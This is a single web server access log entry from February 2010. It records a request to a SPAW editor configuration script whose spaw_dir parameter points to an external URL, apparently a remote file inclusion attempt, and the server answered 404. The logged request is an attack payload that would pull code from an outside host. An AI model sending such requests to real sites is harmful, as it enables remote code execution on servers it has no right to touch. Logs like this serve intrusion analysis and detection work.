211.233.3.101 - - [01/Feb/2010:11:10:20 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
